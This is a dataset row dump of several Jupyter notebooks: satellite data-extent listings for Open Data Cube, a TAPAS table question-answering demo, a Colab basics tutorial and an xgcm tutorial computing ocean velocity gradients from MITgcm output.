"<a class=\"anchor\" id=\"alos2\"></a>\n### alos2_palsar_AMA_ingest\n\n**Caqueta** \n``Time: 2015-01-01 and 2016-01-01 `` \n``latitude: ( 0, 3.2)`` \n``longitude: (-76.26666668, -73.6)`` \n\n**Vietnam** \n``Time: 2015-01-01 and 2016-01-01 `` \n``latitude: ( 7.46666667, 12.8)`` \n``longitude: (103.46666668, 110.4)`` \n\n*****\n<a class=\"anchor\" id=\"ls5\"></a>\n### ls5_level1_usgs\n*No Data Indexed*\n*****\n### ls5_usgs_sr_scene\n\n``Time: 1984-05-26 to 2011-11-13`` \n``y: (-587700.0, 2187300.0)`` \n``x: ( 68100.0, 932400.0)`` \n\n*****\n<a class=\"anchor\" id=\"ls7\"></a>\n### ls7_collection1_AMA_ingest\n\n**Caqueta** \n``Time: 1999-08-21 to 2018-03-25`` \n``latitude: ( 0.000134747292617865, 1.077843593651382)`` \n``longitude: (-74.91935994831539, -73.30266193148462)`` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n**Lake Baringo, Kenya** \n``Time: 2005-01-08 to 2016-12-24`` \n``latitude: ( 0.4997747685, 0.7495947795)`` \n``longitude: (35.9742163305, 36.473586859499996)`` \n``resolution: (-0.000269493, 0.000269493)`` \n\n*****\n### ls7_level1_usgs\n*No Data Indexed*\n\n*****\n### ls7_usgs_sr_scene\n\n``Time: 1999-07-08 to 2018-11-02`` \n``y: (-586200.0, 2185200.0)`` \n``x: ( 70800.0, 935100.0)`` \n\n*****\n<a class=\"anchor\" id=\"ls8\"></a>\n### ls8_collection1_AMA_ingest\n\n**Caqueta** \n``Time: 2013-04-13 to 2018-03-26`` \n``latitude: ( 0.000134747292617865, 1.077843593651382)`` \n``longitude: (-74.91935994831539, -73.30266193148462) `` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n**Vietnam** \n``Time: 2014-01-14 to 2016-12-21`` \n``latitude: ( 10.513927001104687, 12.611133863411238)`` \n``longitude: (106.79005909290998, 108.91906631627438) `` \n``resolution: ( -0.000269494585236, 0.000269494585236)`` \n\n*****\n### ls8_l1_pc_usgs\n*No Data Indexed*\n\n*****\n### ls8_level1_usgs \n[Global](https://sandbox.test.frontiersi.io/user/lsgeo/view/examples/images/indexed_areas.png)\n\n\n*****\n### ls8_usgs_sr_scene\n``Time: 2013-03-21 to 2018-11-16`` \n``y: (-596700.0, 2193300.0)`` \n``x: ( 82500.0, 930300.0)`` \n\n*****\n<a class=\"anchor\" id=\"s1\"></a>\n### s1_gamma0_scene\n\n``Time: 2015-05-12 to 2018-07-20``\n\n**Caqueta** \n``latitude: ( 1.00018083, 2.)`` \n``longitude: (-75., -74.)`` \n\n**Samoa** \n``latitude: ( -13.99981917, -13.)`` \n``longitude: (-171., -173.)`` \n\n",
"_____no_output_____"
],
[
"<a class=\"anchor\" id=\"map\"></a>\n### Plotting Indicative Data Extents\n\nThe following code generates an overview of the approximte extents of the product selected on line 1, shown in red. The yellow base image shows the extents of the global ls8_level1_usgs product.",
"_____no_output_____"
]
],
[
[
"product = 'ls8_collection1_AMA_ingest'\n\nimport matplotlib.pyplot as plt\nfrom pyproj import Proj, transform\n\nimport datacube\ndc = datacube.Datacube()\n\noutProj = Proj(init='epsg:4326')\n\nx_bounds = []\ny_bounds = []\nunique_bounds=set()\nbounds=[]\ntimes=[]\ntiles = dc.find_datasets(product=product)\nif max(tiles[0].bounds) > 180: XY = True\nelse: XY = False\n\nfor tile in tiles:\n if XY:\n inProj = Proj(init=tile.crs)\n l_lon,t_lat = transform(inProj,outProj,tile.bounds.left,tile.bounds.top)\n r_lon,b_lat = transform(inProj,outProj,tile.bounds.right,tile.bounds.bottom)\n x_bounds = [l_lon, r_lon, r_lon, l_lon]\n y_bounds = [t_lat, t_lat, b_lat, b_lat]\n \n else:\n x_bounds = [tile.bounds.left, tile.bounds.right, tile.bounds.right, tile.bounds.left]\n y_bounds = [tile.bounds.top, tile.bounds.top, tile.bounds.bottom, tile.bounds.bottom]\n \n times.append(tile.time)\n bounds_key = \"\".join(str(x) for x in x_bounds) + \"\".join(str(y) for y in y_bounds)\n if bounds_key not in unique_bounds:\n bounds.append([x_bounds, y_bounds, tile.time])\n\n%matplotlib inline\nfig, ax = plt.subplots(1, figsize = (18,9))\nfor i in bounds:\n ax.fill(i[0], i[1], c='red')\nax.axis('equal')\n\nplt.title(product)\nax.set_xlabel('Longitude')\nax.set_ylabel('Latitude')\nbasemap = plt.imread('./examples/images/indexed_areas.png')\nax.imshow(basemap, extent=[-180,180,-90,90])\nax.set_xlim(-180,180)\nax.set_ylim(-90, 90)\nplt.show()\nprint('Time:', min(times[-1]).strftime('%Y-%m-%d'), 'to', max(times[0]).strftime('%Y-%m-%d'))",
"_____no_output_____"
]
],
[
[
"<a class=\"anchor\" id=\"system\"></a>\n# System Information",
"_____no_output_____"
]
],
[
[
"import sys\nprint('Python Version', sys.version)",
"Python Version 3.6.7 (default, Oct 22 2018, 11:32:17) \n[GCC 8.2.0]\n"
],
[
"!pip3 show datacube xarray numpy pandas gdal matplotlib ",
"Name: datacube\nVersion: 1.6.1+179.gc4ed2929.dirty\nSummary: An analysis environment for satellite and other earth observation data\nHome-page: https://github.com/opendatacube/datacube-core\nAuthor: Open Data Cube\nAuthor-email: None\nLicense: Apache License 2.0\nLocation: /usr/local/lib/python3.6/dist-packages\nRequires: affine, cachetools, click, cloudpickle, dask, gdal, jsonschema, netcdf4, numpy, psycopg2, pypeg2, python-dateutil, pyyaml, rasterio, singledispatch, sqlalchemy, toolz, xarray\n---\nName: xarray\nVersion: 0.10.7\nSummary: N-D labeled arrays and datasets in Python\nHome-page: https://github.com/pydata/xarray\nAuthor: xarray Developers\nAuthor-email: [email protected]\nLicense: Apache\nLocation: /usr/local/lib/python3.6/dist-packages\nRequires: pandas, numpy\n---\nName: numpy\nVersion: 1.15.4\nSummary: NumPy: array processing for numbers, strings, records, and objects.\nHome-page: http://www.numpy.org\nAuthor: Travis E. Oliphant et al.\nAuthor-email: None\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: \n---\nName: pandas\nVersion: 0.23.4\nSummary: Powerful data structures for data analysis, time series, and statistics\nHome-page: http://pandas.pydata.org\nAuthor: None\nAuthor-email: None\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: python-dateutil, pytz, numpy\n---\nName: GDAL\nVersion: 2.3.2\nSummary: GDAL: Geospatial Data Abstraction Library\nHome-page: http://www.gdal.org\nAuthor: Howard Butler\nAuthor-email: [email protected]\nLicense: MIT\nLocation: /usr/lib/python3/dist-packages\nRequires: \n---\nName: matplotlib\nVersion: 3.0.2\nSummary: Python plotting package\nHome-page: http://matplotlib.org\nAuthor: John D. Hunter, Michael Droettboom\nAuthor-email: [email protected]\nLicense: BSD\nLocation: /home/jovyan/.local/lib/python3.6/site-packages\nRequires: pyparsing, cycler, python-dateutil, numpy, kiwisolver\n"
]
],
[
[
"## Extent Query Functions",
"_____no_output_____"
]
],
[
[
"#Generates text extents of data\nproduct = 's1_gamma0_scene'\n\nimport datacube\ndc = datacube.Datacube()\nimport numpy as np\n\nleft = np.array([])\nbottom = np.array([])\nright = np.array([])\ntop = np.array([])\ntimes = np.array([])\n\ntiles = dc.find_datasets(product=product)\nfor tile in tiles: #Each tile (unique time for each)\n left = np.append(left, tile.bounds[0])\n right = np.append(right, tile.bounds[2])\n top = np.append(top, tile.bounds[3])\n bottom = np.append(bottom, tile.bounds[1])\n times = np.append(times, tile.time)\n #corners = np.append(corners, [])\nprint('Max Extent')\nprint('``Time:', min(times).strftime('%Y-%m-%d'), 'to', max(times).strftime('%Y-%m-%d')+'`` ')\nprint('``latitude: ('+str(min(np.unique(bottom)))+', '+str(max(np.unique(top)))+')`` ')\nprint('``longitude: ('+str(min(np.unique(left)))+', '+str(max(np.unique(right)))+')`` ')\n\nprint('Discrete Extents')\nprint('``Time:', min(times).strftime('%Y-%m-%d'), 'to', max(times).strftime('%Y-%m-%d')+'`` ')\nprint('``latitude: ('+str(np.unique(bottom))+', '+str(np.unique(top))+')`` ')\nprint('``longitude: ('+str(np.unique(left))+', '+str(np.unique(right))+')`` ')",
"Max Extent\n``Time: 2015-05-12 to 2018-07-20`` \n``latitude: (-13.9998191681736, 2.0)`` \n``longitude: (-173.0, -74.0)`` \nDiscrete Extents\n``Time: 2015-05-12 to 2018-07-20`` \n``latitude: ([-13.99981917 1.00018083], [-13. 2.])`` \n``longitude: ([-173. -172. -75.], [-172. -171. -74.])`` \n"
],
[
"pd.options.display.max_rows = 200\ndc.list_measurements()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
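The extent-plotting cell in the record above reprojects each tile's bounds to lon/lat with pyproj before drawing the footprint polygons. A minimal sketch of that reprojection step in isolation, using the modern `Transformer` API instead of the deprecated `Proj(init=...)`/`transform` calls in the record; the CRS and coordinates are illustrative only:

```python
from pyproj import Transformer

# Convert a projected bounding box to lon/lat, mirroring what the notebook
# does per tile before building the polygon corners. EPSG:32636 (UTM 36N)
# is an assumed example CRS, not necessarily the tiles' actual one.
to_lonlat = Transformer.from_crs("EPSG:32636", "EPSG:4326", always_xy=True)

left, bottom, right, top = 68100.0, -587700.0, 932400.0, 2187300.0  # metres (illustrative)
l_lon, b_lat = to_lonlat.transform(left, bottom)
r_lon, t_lat = to_lonlat.transform(right, top)

x_bounds = [l_lon, r_lon, r_lon, l_lon]  # polygon corner longitudes
y_bounds = [t_lat, t_lat, b_lat, b_lat]  # polygon corner latitudes
print(x_bounds, y_bounds)
```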
e7093db6be194ab0f2ec28580b7550c2fc3e0f17 | 14,239 | ipynb | Jupyter Notebook | notebooks/wtq_predictions.ipynb | renuka1983/Tapas | 9f30d32ffccf25d5650847000099c11e10820ff7 | [
"Apache-2.0"
] | 816 | 2020-03-31T15:15:56.000Z | 2022-03-31T19:28:02.000Z | notebooks/wtq_predictions.ipynb | JingfengYang/tapas | 733aca5273e560ad8c6380b7be984a3a680e97f6 | [
"Apache-2.0"
] | 155 | 2020-05-02T15:45:42.000Z | 2022-03-31T08:35:23.000Z | notebooks/wtq_predictions.ipynb | JingfengYang/tapas | 733aca5273e560ad8c6380b7be984a3a680e97f6 | [
"Apache-2.0"
] | 173 | 2020-05-01T02:39:38.000Z | 2022-03-30T06:43:29.000Z | 37.569921 | 311 | 0.496032 | [
[
[
"<a href=\"https://colab.research.google.com/github/google-research/tapas/blob/master/notebooks/wtq_predictions.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"##### Copyright 2020 The Google AI Language Team Authors\n\nLicensed under the Apache License, Version 2.0 (the \"License\");",
"_____no_output_____"
]
],
[
[
"# Copyright 2019 The Google AI Language Team Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"Running a Tapas fine-tuned checkpoint\n---\nThis notebook shows how to load and make predictions with TAPAS model, which was introduced in the paper: [TAPAS: Weakly Supervised Table Parsing via Pre-training](https://arxiv.org/abs/2004.02349)",
"_____no_output_____"
],
[
"# Clone and install the repository\n",
"_____no_output_____"
],
[
"First, let's install the code.",
"_____no_output_____"
]
],
[
[
"! pip install tapas-table-parsing",
"_____no_output_____"
]
],
[
[
"# Fetch models fom Google Storage",
"_____no_output_____"
],
[
"Next we can get pretrained checkpoint from Google Storage. For the sake of speed, this is a medium sized model trained on [WTQ](https://nlp.stanford.edu/blog/wikitablequestions-a-complex-real-world-question-understanding-dataset/). Note that best results in the paper were obtained with a large model.",
"_____no_output_____"
]
],
[
[
"! gsutil cp \"gs://tapas_models/2020_08_05/tapas_wtq_wikisql_sqa_masklm_medium_reset.zip\" \"tapas_model.zip\" && unzip tapas_model.zip\n! mv tapas_wtq_wikisql_sqa_masklm_medium_reset tapas_model",
"_____no_output_____"
]
],
[
[
"# Imports",
"_____no_output_____"
]
],
[
[
"import tensorflow.compat.v1 as tf\nimport os \nimport shutil\nimport csv\nimport pandas as pd\nimport IPython\n\ntf.get_logger().setLevel('ERROR')",
"_____no_output_____"
],
[
"from tapas.utils import tf_example_utils\nfrom tapas.protos import interaction_pb2\nfrom tapas.utils import number_annotation_utils\nfrom tapas.scripts import prediction_utils",
"_____no_output_____"
]
],
[
[
"# Load checkpoint for prediction",
"_____no_output_____"
],
[
"Here's the prediction code, which will create and `interaction_pb2.Interaction` protobuf object, which is the datastructure we use to store examples, and then call the prediction script.",
"_____no_output_____"
]
],
[
[
"os.makedirs('results/wtq/tf_examples', exist_ok=True)\nos.makedirs('results/wtq/model', exist_ok=True)\nwith open('results/wtq/model/checkpoint', 'w') as f:\n f.write('model_checkpoint_path: \"model.ckpt-0\"')\nfor suffix in ['.data-00000-of-00001', '.index', '.meta']:\n shutil.copyfile(f'tapas_model/model.ckpt{suffix}', f'results/wtq/model/model.ckpt-0{suffix}')",
"_____no_output_____"
],
[
"max_seq_length = 512\nvocab_file = \"tapas_model/vocab.txt\"\nconfig = tf_example_utils.ClassifierConversionConfig(\n vocab_file=vocab_file,\n max_seq_length=max_seq_length,\n max_column_id=max_seq_length,\n max_row_id=max_seq_length,\n strip_column_names=False,\n add_aggregation_candidates=False,\n)\nconverter = tf_example_utils.ToClassifierTensorflowExample(config)\n\ndef convert_interactions_to_examples(tables_and_queries):\n \"\"\"Calls Tapas converter to convert interaction to example.\"\"\"\n for idx, (table, queries) in enumerate(tables_and_queries):\n interaction = interaction_pb2.Interaction()\n for position, query in enumerate(queries):\n question = interaction.questions.add()\n question.original_text = query\n question.id = f\"{idx}-0_{position}\"\n for header in table[0]:\n interaction.table.columns.add().text = header\n for line in table[1:]:\n row = interaction.table.rows.add()\n for cell in line:\n row.cells.add().text = cell\n number_annotation_utils.add_numeric_values(interaction)\n for i in range(len(interaction.questions)):\n try:\n yield converter.convert(interaction, i)\n except ValueError as e:\n print(f\"Can't convert interaction: {interaction.id} error: {e}\")\n \ndef write_tf_example(filename, examples):\n with tf.io.TFRecordWriter(filename) as writer:\n for example in examples:\n writer.write(example.SerializeToString())\n\ndef aggregation_to_string(index):\n if index == 0:\n return \"NONE\"\n if index == 1:\n return \"SUM\"\n if index == 2:\n return \"AVERAGE\"\n if index == 3:\n return \"COUNT\"\n raise ValueError(f\"Unknown index: {index}\")\n\ndef predict(table_data, queries):\n table = [list(map(lambda s: s.strip(), row.split(\"|\"))) \n for row in table_data.split(\"\\n\") if row.strip()]\n examples = convert_interactions_to_examples([(table, queries)])\n write_tf_example(\"results/wtq/tf_examples/test.tfrecord\", examples)\n write_tf_example(\"results/wtq/tf_examples/random-split-1-dev.tfrecord\", [])\n \n ! python -m tapas.run_task_main \\\n --task=\"WTQ\" \\\n --output_dir=\"results\" \\\n --noloop_predict \\\n --test_batch_size={len(queries)} \\\n --tapas_verbosity=\"ERROR\" \\\n --compression_type= \\\n --reset_position_index_per_cell \\\n --init_checkpoint=\"tapas_model/model.ckpt\" \\\n --bert_config_file=\"tapas_model/bert_config.json\" \\\n --mode=\"predict\" 2> error\n\n\n results_path = \"results/wtq/model/test.tsv\"\n all_coordinates = []\n df = pd.DataFrame(table[1:], columns=table[0])\n display(IPython.display.HTML(df.to_html(index=False)))\n print()\n with open(results_path) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n for row in reader:\n coordinates = sorted(prediction_utils.parse_coordinates(row[\"answer_coordinates\"]))\n all_coordinates.append(coordinates)\n answers = ', '.join([table[row + 1][col] for row, col in coordinates])\n position = int(row['position'])\n aggregation = aggregation_to_string(int(row[\"pred_aggr\"]))\n print(\">\", queries[position])\n answer_text = str(answers)\n if aggregation != \"NONE\":\n answer_text = f\"{aggregation} of {answer_text}\"\n print(answer_text)\n return all_coordinates",
"_____no_output_____"
]
],
[
[
"# Predict",
"_____no_output_____"
]
],
[
[
"# Based on SQA example nu-1000-0\nresult = predict(\"\"\"\nPos | No | Driver | Team | Laps | Time/Retired | Grid | Points\n1 | 32 | Patrick Carpentier | Team Player's | 87 | 1:48:11.023 | 1 | 22 \n2 | 1 | Bruno Junqueira | Newman/Haas Racing | 87 | +0.8 secs | 2 | 17 \n3 | 3 | Paul Tracy | Team Player's | 87 | +28.6 secs | 3 | 14\n4 | 9 | Michel Jourdain, Jr. | Team Rahal | 87 | +40.8 secs | 13 | 12\n5 | 34 | Mario Haberfeld | Mi-Jack Conquest Racing | 87 | +42.1 secs | 6 | 10\n6 | 20 | Oriol Servia | Patrick Racing | 87 | +1:00.2 | 10 | 8 \n7 | 51 | Adrian Fernandez | Fernandez Racing | 87 | +1:01.4 | 5 | 6\n8 | 12 | Jimmy Vasser | American Spirit Team Johansson | 87 | +1:01.8 | 8 | 5\n9 | 7 | Tiago Monteiro | Fittipaldi-Dingman Racing | 86 | + 1 Lap | 15 | 4\n10 | 55 | Mario Dominguez | Herdez Competition | 86 | + 1 Lap | 11 | 3\n11 | 27 | Bryan Herta | PK Racing | 86 | + 1 Lap | 12 | 2\n12 | 31 | Ryan Hunter-Reay | American Spirit Team Johansson | 86 | + 1 Lap | 17 | 1\n13 | 19 | Joel Camathias | Dale Coyne Racing | 85 | + 2 Laps | 18 | 0\n14 | 33 | Alex Tagliani | Rocketsports Racing | 85 | + 2 Laps | 14 | 0\n15 | 4 | Roberto Moreno | Herdez Competition | 85 | + 2 Laps | 9 | 0\n16 | 11 | Geoff Boss | Dale Coyne Racing | 83 | Mechanical | 19 | 0\n17 | 2 | Sebastien Bourdais | Newman/Haas Racing | 77 | Mechanical | 4 | 0\n18 | 15 | Darren Manning | Walker Racing | 12 | Mechanical | 7 | 0\n19 | 5 | Rodolfo Lavin | Walker Racing | 10 | Mechanical | 16 | 0\n\"\"\", [\"Who are the drivers with 87 laps?\", \"Sum of laps for team Walker Racing?\", \"Average grid for the drivers with less than 80 laps?\",])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
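The TAPAS record above turns a prediction into an answer by looking up the predicted cell coordinates in the table and applying the operator from `aggregation_to_string`. A small sketch of that post-processing step on a toy table; it does not need the checkpoint, and the coordinates and table values are illustrative:

```python
# Apply a TAPAS-style (coordinates, aggregation) prediction to a toy table.
table = [["Driver", "Laps"],
         ["Patrick Carpentier", "87"],
         ["Bruno Junqueira", "87"],
         ["Darren Manning", "12"]]

def apply_prediction(table, coordinates, aggregation):
    """coordinates are (row, col) pairs into the table body; row 0 is the header."""
    cells = [table[row + 1][col] for row, col in coordinates]  # +1 skips the header
    if aggregation == "NONE":
        return ", ".join(cells)
    values = [float(c) for c in cells]
    if aggregation == "SUM":
        return sum(values)
    if aggregation == "AVERAGE":
        return sum(values) / len(values)
    if aggregation == "COUNT":
        return len(values)
    raise ValueError(f"Unknown aggregation: {aggregation}")

print(apply_prediction(table, [(0, 1), (1, 1)], "SUM"))  # 174.0
```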
e7093f59aa577ea888f95f58d2bcde6550007f52 | 6,459 | ipynb | Jupyter Notebook | notebooks/00_Notebooks.ipynb | yutiansut/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 51 | 2019-02-01T19:43:37.000Z | 2022-03-16T09:07:03.000Z | notebooks/00_Notebooks.ipynb | Approximetal/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 13 | 2020-01-28T22:32:51.000Z | 2022-03-11T23:39:06.000Z | notebooks/00_Notebooks.ipynb | Approximetal/practicalAI | add4bd386425bdb2f86738b8793097d96dd2776e | [
"MIT"
] | 35 | 2019-02-08T02:00:31.000Z | 2022-03-01T23:17:00.000Z | 30.323944 | 271 | 0.514476 | [
[
[
"# Notebook Basics",
"_____no_output_____"
],
[
"<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/logo.png\" width=150>\n\nWelcome to the very first lesson of practicalAI. In this lesson we will learn how to work with the notebook and saving it. If you already know how to use notebooks, feel free to skip this lesson.\n\n<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/colab.png\" width=150>\n\n**Note**: To run the code in this notebook, follow these steps:\n1. Sign into your Google account.\n2. Click the **COPY TO DRIVE** button on the toolbar. This will open the notebook on a new tab.\n\n<img src=\"https://raw.githubusercontent.com/GokuMohandas/practicalAI/master/images/copy_to_drive.png\">\n\n3. Rename this new notebook by removing the **Copy of** part in the title.\n4. Run the code, make changes, etc. and it's all automatically saved to you personal Google Drive.\n\n",
"_____no_output_____"
],
[
"# Types of cells",
"_____no_output_____"
],
[
"Notebooks are a great visual way of programming. We will use these notebooks to code in Python and learn the basics of machine learning. First, you need to know that notebooks are made up of cells. Each cell can either be a **code cell** or a **text cell**. \n\n* **text cells**: used for headers and paragraph text. \n* **code cells**: used for holding code.\n\n\n",
"_____no_output_____"
],
[
"# Creating cells\n\nFirst, let's create a text cell. To create a cell at a particular location, just click on the spot and create a text cell by clicking on the **➕TEXT** below the *View* button up top. Once you made the cell, click on it and type the following inside it:\n\n\n```\n### This is a header\nHello world!\n```",
"_____no_output_____"
],
[
"# Running cells\nOnce you type inside the cell, press the **SHIFT** and **ENTER** together to run the cell.",
"_____no_output_____"
],
[
"# Editing cells\nTo edit a cell, double click it and you should be able to replace what you've typed in there.",
"_____no_output_____"
],
[
"# Moving cells\nOnce you create the cell, you can move it with the ⬆️**CELL** and ⬇️**CELL** buttons above. ",
"_____no_output_____"
],
[
"# Deleting cells\nYou can delete the cell by clicking on the cell and pressing the button with three vertical dots on the top right corner of the cell. Click **Delete cell**.",
"_____no_output_____"
],
[
"# Creating a code cell\nNow let's take the same steps as above to create, edit and delete a code cell. You can create a code cell by clicking on the ➕CODE below the *File* menu at the top. Once you have created the cell, click on it and type the following inside it:\n\n```\nprint (\"hello world!\")\n```\n\n⏰ - It may take a few seconds when you run your first code cell.",
"_____no_output_____"
]
],
[
[
"print (\"hello world!\")",
"hello world!\n"
]
],
[
[
"**Note:** These Google colab notebooks timeout if you are idle for more than ~30 minutes which means you'll need to run all your code cells again. ",
"_____no_output_____"
],
[
"# Saving the notebook",
"_____no_output_____"
],
[
"Go to *File* menu and then click on **Save a copy in Drive**. Now you will have your own copy of each notebook in your own Google Drive. If you have a [Github](https://github.com/), you can explore saving it there or even downloading it as a .ipynb or .py file.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e7093fa286f9150453a6fbaf10578e0ce2776af6 | 360,838 | ipynb | Jupyter Notebook | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 159.310375 | 36,112 | 0.804095 | [
[
[
"# MITgcm Example \n\nxgcm is developed in close coordination with the [xmitgcm](http://xmitgcm.readthedocs.io/) package.\nThe metadata in datasets constructed by xmitgcm should always be compatible with xgcm's expectations.\nxmitgcm is necessary for reading MITgcm's binary MDS file format.\nHowever, for this example, the MDS files have already been converted and saved as netCDF.\n\nBelow are some example of how to make calculations on mitgcm-style datasets using xgcm.\n\nFirst we import xarray and xgcm:",
"_____no_output_____"
]
],
[
[
"import xarray as xr\nimport numpy as np\nimport xgcm\nfrom matplotlib import pyplot as plt\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (10,6)",
"_____no_output_____"
]
],
[
[
"Now we open the example dataset which is stored in a [zenodo archive](https://zenodo.org/record/4421428#.X_XP7y1h3x9).",
"_____no_output_____"
]
],
[
[
"# download the data\nimport urllib.request\nimport shutil\n\nurl = 'https://zenodo.org/record/4421428/files/'\nfile_name = 'mitgcm_example_dataset_v2.nc'\nwith urllib.request.urlopen(url + file_name) as response, open(file_name, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n \n# open the data\nds = xr.open_dataset(file_name)\nds",
"_____no_output_____"
]
],
[
[
"### Creating the grid object\n\nNext we create a `Grid` object from the dataset.\nWe need to tell xgcm that the `X` and `Y` axes are periodic.\n(The other axes will be assumed to be non-periodic.)",
"_____no_output_____"
]
],
[
[
"grid = xgcm.Grid(ds, periodic=['X', 'Y'])\ngrid",
"_____no_output_____"
]
],
[
[
"We see that xgcm identified five different axes: X (longitude), Y (latitude), Z (depth), T (time), and 1RHO (the axis generated by the output of the LAYERS package).\n\n## Velocity Gradients\n\nThe gradients of the velocity field can be decomposed as divergence, vorticity, and strain. Below we use xgcm to compute the velocity gradients of the horizontal flow.\n\n### Divergence\n\nThe divergence of the horizontal flow is is expressed as\n\n$$ \\frac{\\partial u}{\\partial x} + \\frac{\\partial v}{\\partial y} $$\n\n\nIn discrete form, using [MITgcm notation](https://mitgcm.readthedocs.io/en/latest/algorithm/algorithm.html#horizontal-divergence), the formula for the divergence on C-grid is\n\n$$ \\frac{1}{A_c h_c} ( \\delta_i \\Delta y_g h_w u + \\delta_j \\Delta x_g h_s v ) $$\n\nThe `UVEL`, `dyG` and `hFacW` DataArrays are defined on the U-points, which are on the left points of the X-axis (`XG`), while the `VVEL`, `dxG` and `hFacS` DataArrays are defined on V-points, which are the left point of the Y -axis (`YG`).",
"_____no_output_____"
]
],
[
[
"display(ds.UVEL.dims)\ndisplay(ds.VVEL.dims)",
"_____no_output_____"
],
[
"print(ds.UVEL.dims[2:] == ds.dyG.dims == ds.hFacW.dims[1:])\nprint(ds.VVEL.dims[2:] == ds.dxG.dims == ds.hFacS.dims[1:])",
"True\nTrue\n"
]
],
[
[
"Now comes the xgcm magic: we take the diff along both axes and divide by the cell area element to find the divergence of the horizontal flow. Note how this new variable is at the cell center point.",
"_____no_output_____"
]
],
[
[
"div_uv = (grid.diff(ds.UVEL * ds.dyG * ds.hFacW, 'X') + grid.diff(ds.VVEL * ds.dxG * ds.hFacS, 'Y')) / (ds.rA * ds.hFacC)\ndiv_uv.dims",
"_____no_output_____"
]
],
[
[
"We plot this near the surface and observe the expected patern of divergence at the equator and in the subpolar regions, and convergence in the subtropical gyres.",
"_____no_output_____"
]
],
[
[
"div_uv[0, 0].plot()",
"_____no_output_____"
]
],
[
[
"### Vorticity\n\nThe vertical component of the vorticity is a fundamental quantity of interest in ocean circulation theory. It is defined as\n\n$$ \\zeta = - \\frac{\\partial u}{\\partial y} + \\frac{\\partial v}{\\partial x} \\ . $$\n\nOn the c-grid, a finite-volume representation is given by\n\n$$ \\zeta = (- \\delta_j \\Delta x_c u + \\delta_i \\Delta y_c v ) / A_\\zeta \\ . $$\n\nIn xgcm, we calculate this quantity as",
"_____no_output_____"
]
],
[
[
"zeta = (-grid.diff(ds.UVEL * ds.dxC, 'Y') + grid.diff(ds.VVEL * ds.dyC, 'X'))/ds.rAz\nzeta",
"_____no_output_____"
]
],
[
[
"...which we can see is located at the `YG, XG` horizontal position (also commonly called the vorticity point).\n\nWe plot the vertical integral of this quantity, i.e. the barotropic vorticity:",
"_____no_output_____"
]
],
[
[
"zeta_bt = (zeta * ds.drF).sum(dim='Z')\nzeta_bt.plot(vmax=2e-4)",
"_____no_output_____"
]
],
[
[
"A different way to calculate the barotropic vorticity is to take the curl of the vertically integrated velocity.\nThis formulation also allows us to incorporate the $h$ factors representing partial cell thickness.",
"_____no_output_____"
]
],
[
[
"u_bt = (ds.UVEL * ds.hFacW * ds.drF).sum(dim='Z')\nv_bt = (ds.VVEL * ds.hFacS * ds.drF).sum(dim='Z')\nzeta_bt_alt = (-grid.diff(u_bt * ds.dxC, 'Y') + grid.diff(v_bt * ds.dyC, 'X'))/ds.rAz\nzeta_bt_alt.plot(vmax=2e-4)",
"_____no_output_____"
]
],
[
[
"### Strain\n\nAnother interesting quantity is the horizontal strain, defined as\n\n$$ s = \\frac{\\partial u}{\\partial x} - \\frac{\\partial v}{\\partial y} \\ . $$\n\nOn the c-grid, a finite-volume representation is given by\n\n$$ s = (\\delta_i \\Delta y_g u - \\delta_j \\Delta x_g v ) / A_c \\ . $$",
"_____no_output_____"
]
],
[
[
"strain = (grid.diff(ds.UVEL * ds.dyG, 'X') - grid.diff(ds.VVEL * ds.dxG, 'Y')) / ds.rA\nstrain[0,0].plot()",
"_____no_output_____"
]
],
[
[
